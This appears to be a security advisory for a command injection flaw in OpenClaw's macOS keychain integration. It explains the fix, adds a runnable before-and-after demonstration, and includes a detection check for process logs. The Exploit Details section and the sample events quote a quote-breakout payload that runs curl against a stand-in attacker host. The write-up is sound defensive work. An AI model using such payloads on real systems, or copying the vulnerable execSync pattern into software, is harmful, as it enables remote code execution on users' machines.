OpenClaw Keychain Injection: When Secure Storage Becomes a Shell
Vulnerability ID: GHSA-4564-PVR2-QQ4H
CVSS Score: 8.8
Published: 2026-02-18
A high-severity OS command injection vulnerability (CVSS 8.8) in the OpenClaw AI assistant allows remote code execution via a malicious OAuth token. The application interpolated the token, unsanitized, into a shell command string that it then ran through the macOS `security` utility, so an attacker who controls the OAuth response can execute arbitrary shell commands with the privileges of the host user. This turns the keychain credential management feature, designed to protect secrets, into a high-impact entry point for compromise.
TL;DR
OpenClaw's macOS keychain integration built the `security` command as a shell string and ran it with `execSync`, interpolating the OAuth token directly into the single-quoted `-w` argument. A token containing shell metacharacters breaks out of that quoting and is executed by `/bin/sh`, giving the attacker RCE as the user running OpenClaw. Fixed in v2026.2.14.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-78
- Attack Vector: Network (via OAuth response)
- CVSS: 8.8 (High)
- Impact: Remote Code Execution (RCE)
- Exploit Status: PoC Available
- Platform: macOS
Affected Systems
- macOS (all versions)
- openclaw < 2026.2.14 (fixed in 2026.2.14)
Code Analysis
Commit: 9dce3d8
Refactor keychain write to use execFileSync for security
- execSync(`security ... -w '${newValue}'`)
+ execFileSync('security', [..., '-w', newValue])
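Review bot: the switch to an argument array is the right fix, since nothing between Node and `security` interprets `newValue` any more, but the `...` in the `+` line must be expanded to one array element per flag and per value; a single string that still contains spaces would reach `security` as one argument and the call would fail or misbehave. Also worth a code comment: the secret still travels as a command-line argument (`'-w', newValue`), so it is visible in `ps` output to other processes on the host for the duration of the call, an exposure this change neither introduces nor removes.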
Exploit Details
- Internal test suite: the payload `x'$(curl attacker.com)'y` demonstrates command-substitution injection. The leading single quote closes the quoted `-w '...'` argument, `$(curl attacker.com)` is then evaluated by `/bin/sh` as a command substitution (so `curl` runs with the user's privileges and calls back to the attacker), and the trailing quote reopens the string so the command remains syntactically valid, with the output of `curl` spliced into the argument.
Mitigation Strategies
- Avoid using `exec` or `execSync` with user-controlled input; both hand the entire command string to `/bin/sh -c`, which interprets quotes, `$(...)`, backticks, `;`, `|` and `&`.
- Prefer `execFile` or `spawn`, which accept arguments as an array and pass them to the program directly with no shell in between. Do not set the `shell: true` option on these calls, as it reintroduces the shell and the same injection risk.
- If shell execution is strictly required, use a rigorous escaping library (like `shell-quote`), though this is discouraged.
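The following is an added example, not code from OpenClaw or from the advisory, that puts the vulnerable `execSync` pattern from the Exploit Details section beside the `execFileSync` form recommended above. Because the macOS `security` binary is not available everywhere and would modify a real keychain, `printf` stands in for it (an assumption made only so the block runs on any POSIX host with Node.js), and the constructed payload uses a harmless `echo` in place of `curl attacker.com`. The shape of the injection is identical: the value is spliced into a single-quoted argument of a shell string.

```typescript
// Added example (not OpenClaw's code). `printf` stands in for the macOS
// `security` binary so the block runs on any POSIX system with Node.js.
import { execSync, execFileSync } from "node:child_process";

// Pre-fix shape: the value is interpolated into a shell command string and the
// whole string is handed to /bin/sh -c. Quotes inside the value are parsed by
// the shell, not treated as data.
function renderVulnerableCommand(newValue: string): string {
  return `printf '%s' '${newValue}'`;
}

function vulnerableWrite(newValue: string): string {
  return execSync(renderVulnerableCommand(newValue), { encoding: "utf8" });
}

// Post-fix shape: no shell is involved. Each array element reaches the program
// as one argv entry, so metacharacters in the value are just bytes.
function hardenedWrite(newValue: string): string {
  return execFileSync("printf", ["%s", newValue], { encoding: "utf8" });
}

// Constructed payload with the same structure as the advisory's
// x'$(curl attacker.com)'y: close the quote, substitute a command, reopen it.
const PAYLOAD = "x'$(echo INJECTED)'y";

function demo(): { shellSaw: string; vulnerable: string; hardened: string } {
  return {
    // The command line /bin/sh receives: printf '%s' 'x'$(echo INJECTED)'y'
    shellSaw: renderVulnerableCommand(PAYLOAD),
    // The shell evaluates $(echo INJECTED) and glues the pieces together.
    vulnerable: vulnerableWrite(PAYLOAD),
    // The value arrives untouched, quotes and $( ) included.
    hardened: hardenedWrite(PAYLOAD),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Swap `printf` for `security` and the `%s` argument for the real `add-generic-password` flags and this is the before/after of commit 9dce3d8: the vulnerable branch returns `xINJECTEDy`, proving the substitution ran, while the hardened branch returns the payload string verbatim.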
Remediation Steps:
- Upgrade `openclaw` to version 2026.2.14 or later immediately.
- If you cannot upgrade, manually patch `src/agents/cli-credentials.ts` to use `execFileSync` (with each `security` flag and value as a separate array element) instead of `execSync`.
- Audit process-execution telemetry (EDR, Endpoint Security framework exec events, or the unified log) for `/bin/sh -c` children of the OpenClaw Node.js process whose command line contains `security` together with `curl`, `wget`, `bash` or command-substitution syntax. Interactive shell history such as `~/.zsh_history` will not record these commands, because `execSync` runs them through a non-interactive `/bin/sh -c`, so it is not a reliable indicator on its own.
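As an added example for the audit step above (not OpenClaw's code or any vendor's detection rule), the check below runs over process-execution records and flags shell-wrapped `security` invocations whose command line carries substitution or chaining syntax, which a legitimate OAuth token (base64url or JWT characters) never contains. The record shape and the sample events are constructed for this example; adapt the field names to whatever your EDR or Endpoint Security consumer emits.

```typescript
// Added example (not OpenClaw's code). Record format is constructed for this
// example, not any particular EDR schema.
interface ExecEvent {
  pid: number;
  parentImage: string; // path of the parent process image
  argv: string[];      // argv of the executed process
}

// Command substitution and chaining syntax; none of these characters occur in
// a well-formed OAuth token, so their presence in a `security -w` command line
// built by the vulnerable template indicates quote breakout.
const SHELL_METACHARS = /\$\(|`|;|&&|\||\n/;

// True for `sh -c <string>` style wrappers, which is how execSync runs commands.
function isShellWrapper(argv: string[]): boolean {
  const base = argv[0].split("/").pop();
  return (base === "sh" || base === "bash" || base === "zsh") && argv[1] === "-c" && argv.length >= 3;
}

// Returns a finding string for a suspicious keychain write, or null if benign.
function suspiciousKeychainWrite(ev: ExecEvent): string | null {
  if (!isShellWrapper(ev.argv)) return null; // direct exec (the fixed path) is not flagged
  const cmd = ev.argv[2];
  if (!/\bsecurity\b/.test(cmd) || !/\s-w\s/.test(cmd)) return null;
  if (!SHELL_METACHARS.test(cmd)) return null;
  return `pid ${ev.pid} (parent ${ev.parentImage}): shell-wrapped security call with metacharacters: ${cmd}`;
}

function triage(events: ExecEvent[]): string[] {
  return events.map(suspiciousKeychainWrite).filter((m): m is string => m !== null);
}

// Constructed sample events.
const SAMPLE_EVENTS: ExecEvent[] = [
  // vulnerable version storing a normal-looking token: shell-wrapped, but no metacharacters
  { pid: 4101, parentImage: "/usr/local/bin/node",
    argv: ["/bin/sh", "-c", "security add-generic-password -a user -s svc -w 'eyJhbGciOiJSUzI1NiJ9.abc' -U"] },
  // exploit attempt: the advisory's quote-breakout payload inside the -w argument
  { pid: 4102, parentImage: "/usr/local/bin/node",
    argv: ["/bin/sh", "-c", "security add-generic-password -a user -s svc -w 'x'$(curl attacker.com)'y' -U"] },
  // fixed version: security executed directly, payload arrives as one inert argument
  { pid: 4103, parentImage: "/usr/local/bin/node",
    argv: ["/usr/bin/security", "add-generic-password", "-a", "user", "-s", "svc", "-w", "x'$(curl attacker.com)'y", "-U"] },
  // unrelated interactive shell activity
  { pid: 4104, parentImage: "/bin/zsh", argv: ["/bin/sh", "-c", "ls -la | grep foo"] },
];

for (const finding of triage(SAMPLE_EVENTS)) console.log(finding);
```

Only the second event is reported: the first is the vulnerable code path doing its normal job, the third is the patched path (no shell, so nothing to break out of), and the fourth has metacharacters but no `security` call.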
References
Read the full report for GHSA-4564-PVR2-QQ4H on our website for more details including interactive diagrams and full exploit analysis.